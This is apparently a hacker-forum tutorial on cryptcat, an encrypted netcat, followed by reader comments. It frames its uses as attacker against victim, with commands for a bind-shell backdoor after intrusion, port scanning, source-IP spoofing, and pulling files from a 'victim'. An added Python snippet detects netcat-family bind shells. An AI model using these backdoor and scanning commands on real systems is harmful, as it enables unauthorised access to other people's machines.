
Cryptcat: Advanced Usage

By ghostghost | 14548 Reads

+=+=+=+=+=+=+=+=+= Cryptcat: Advanced Usage +=+=+=+=+=+=+=+=+=

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, the whole stream is encrypted in twofish… So it doesn't get sniffed! Because of that, both ends have to be cryptcat using the same key, or neither side can make sense of the other.

This tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish various connections across networks.

So, if you've ever used netcat, then it should be easy for you to use cryptcat. The command-line syntax is the same.

Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:


First, to establish a connection between two machines, we'd go about this by:

-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-

$ cryptcat -l -p 3333

-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-

$ cryptcat 192.168.1.1 3333


You can also use cryptcat for banner grabbing, e.g. against an SMTP server:

$ cryptcat 192.168.1.1 25
220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun 19 Feb 2007 12:25:02 -0500 (EST)

This should connect you to the SMTP server, which greets you with its banner: the server's name and version.


You can also feed cryptcat a request from a file to banner grab, say against an HTTP server, like so:

$ cryptcat hostname 80 < get_reqst.txt

Set get_reqst.txt to contain the following request:

HEAD / HTTP/1.0[ENTER] [ENTER]

(Don't actually type [ENTER]; just press Enter twice. Duh!)

OR, try it straight from the SHELL:

$ echo -e "GET / HTTP/1.0\n\n" | cryptcat -w 5 192.168.1.1 80


Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port that you have the local machine listen on with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:

$ cryptcat -e /bin/sh -l -p 9999

(That's assuming the victim is running UNIX.) Now, as the attacker, all you need to do is connect to the victim, from your machine or locally, and that should spawn a shell for j00:

$ cryptcat 192.168.1.1 9999
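As an added example (not from this article or the cryptcat project), here is the defender's side of the backd00r above: a check that walks `ps -eo pid,user,args` output and flags netcat-family processes that both listen and hand a program the socket. It generalises from cryptcat to the nc/ncat spellings of the same flags, and the process list it scans is constructed, not captured from a real host.

```python
import os
import shlex

# Constructed sample of `ps -eo pid,user,args` output, not captured from a real host.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 www-data /usr/sbin/apache2 -k start
 2314 bob      cryptcat -e /bin/sh -l -p 9999
 2401 bob      cryptcat -v -l -p 9999
 2477 alice    nc -lp 8080 -e /bin/bash
 2590 root     /usr/bin/cryptcat 192.168.1.1 9999
 2611 carol    ncat --exec /bin/sh -l 4444
"""

NETCAT_BINARIES = {"nc", "netcat", "ncat", "cryptcat"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # hand a program the socket
LISTEN_FLAGS = {"-l", "--listen"}                  # wait for inbound connections


def classify(argv):
    """Rank a netcat-family argv; None means nothing worth alerting on."""
    flags = set()
    for tok in argv[1:]:
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 2:
            flags.update("-" + ch for ch in tok[1:])   # split bundled -lp into -l, -p
        elif tok.startswith("-"):
            flags.add(tok)
    execs, listens = bool(flags & EXEC_FLAGS), bool(flags & LISTEN_FLAGS)
    if execs and listens:
        return "bind_shell"    # listen and hand out a shell: the backdoor above
    if execs:
        return "exec_client"   # connect out and attach a program: reverse shell
    if listens:
        return "listener"      # plain listener, e.g. the file-transfer server
    return None


def scan_ps(ps_output):
    """Return (pid, user, binary, kind) for each suspicious netcat-family process."""
    findings = []
    for line in ps_output.splitlines()[1:]:        # first line is the ps header
        parts = line.split(None, 2)                # pid, user, rest of command line
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        argv = shlex.split(cmd)
        binary = os.path.basename(argv[0]) if argv else ""
        if binary in NETCAT_BINARIES and (kind := classify(argv)):
            findings.append((int(pid), user, binary, kind))
    return findings
```

A plain client connection with no flags (like the attacker's side above) produces no finding; the listener with -e on the victim is what lights up.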


You can even make cryptcat act like a PORT SCANNER with:

$ cryptcat -v -z 192.168.1.1 1-9999

This scans 192.168.1.1 for ports 1 to 9999 (-z is zero-I/O mode, so it only reports whether each port is open, and -v makes it print each result).


Also, you can use it to sp00f your source IP Address:

$ cryptcat -s 69.13.37.69 192.168.1.1

Remember, the sp00fed IP address (69.13.37.69) comes before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Note that -s just sets the source address of an ordinary socket, so the kernel only accepts an address that one of your own interfaces actually holds. Don't start thinking of how malicious you can be with this!


Ah, yes, and one of my favourites… Transferring Files. To do this, simply set a computer (not necessarily a victim) to serve a file (take_me.txt):

$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is:

$ cryptcat -v 192.168.1.1 9999 > take_me.txt

Note: 192.168.1.1 is still the server/victim.


And finally, you can use it for source-routing to connect to a port on a remote host:

$ cryptcat -g 69.13.37.69 192.168.1.1 9999

Note: 69.13.37.69 is the gateway we route through to reach port 9999 on 192.168.1.1.

LINKS
Homepage: http://farm9.org/Cryptcat/
Download: http://sourceforge.net/projects/cryptcat/
Man Page: http://www.phlak.org/docs/tools/cryptcat.txt

Hope you learned s0mething at least. Expect more! And …

Always Remember! 1: Netfish is RIGHT. 2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.

Comments
ghost 17 years ago

yet another badass article by the netfish…. let no one say he doesn't contribute. …. lol netfish…. enjoyed the article tho…. :ninja:

ghost 17 years ago

o.0 A little confused, next time explain the O/S, that it's unix, etc. Good job though.

ghost 17 years ago

Interesting, never even heard of cryptcat, good read.

ghost 17 years ago

Keep up the great articles dude. Awesome to read something worthwhile

ghost 17 years ago

@HardHackz … no need to explain what OS it is for, it has ports to pretty much all the main ones, comprising Windows NT, BSD and Linux. The syntax remains the same on all those platforms too.

ghost 17 years ago

good article, nice info.

ghost 17 years ago

nice work man!:happy:

ghost 17 years ago

waste of time